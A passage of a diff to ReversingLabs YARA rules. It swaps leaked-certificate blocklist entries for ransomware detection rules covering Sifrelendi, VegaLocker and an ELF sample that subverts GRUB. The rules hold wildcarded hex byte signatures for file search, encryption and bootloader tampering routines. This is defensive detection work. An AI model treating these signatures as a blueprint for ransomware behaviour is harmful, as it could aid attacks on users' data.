+            83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1
+        }
+		$encrypt_files_2 = {
+            EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89
+            CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ??
+            ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48
+            C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
+            85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
+            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
+            48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48
+            C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
+            ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33
+            34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$search_files = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ??
+            E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0
+            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ??
+            ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0
+            66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$subvert_grub_1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
+            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
+            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
+        }
+		$subvert_grub_2 = {
+            48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48
+            8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ??
+            ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ??
+            ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85
+        }
+		$subvert_grub_3 = {
+            48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5
+            ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D
+            B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B
+            55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $search_files and ( all of ( $encrypt_files_* ) ) and ( all of ( $subvert_grub_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Sifrelendi ransomware."
 		author = "ReversingLabs"
-		id = "da1895fd-ec29-513d-b8ae-2317f84b8280"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "b9083b7c-eb09-52da-a240-39b51df892f9"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1344-L1360"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803"
+		logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sifrelendi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB
+            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D
+            C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ??
+            ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45
+            ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A
+            ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B
+            C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects VegaLocker ransomware."
 		author = "ReversingLabs"
-		id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1362-L1378"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad"
+		logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VegaLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
+            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
+            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
+            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
+            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
+            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
+            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85
+            ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68
+            ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+        }
+		$encrypt_files_p2 = {
+            64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ??
+            0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB
+            ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ??
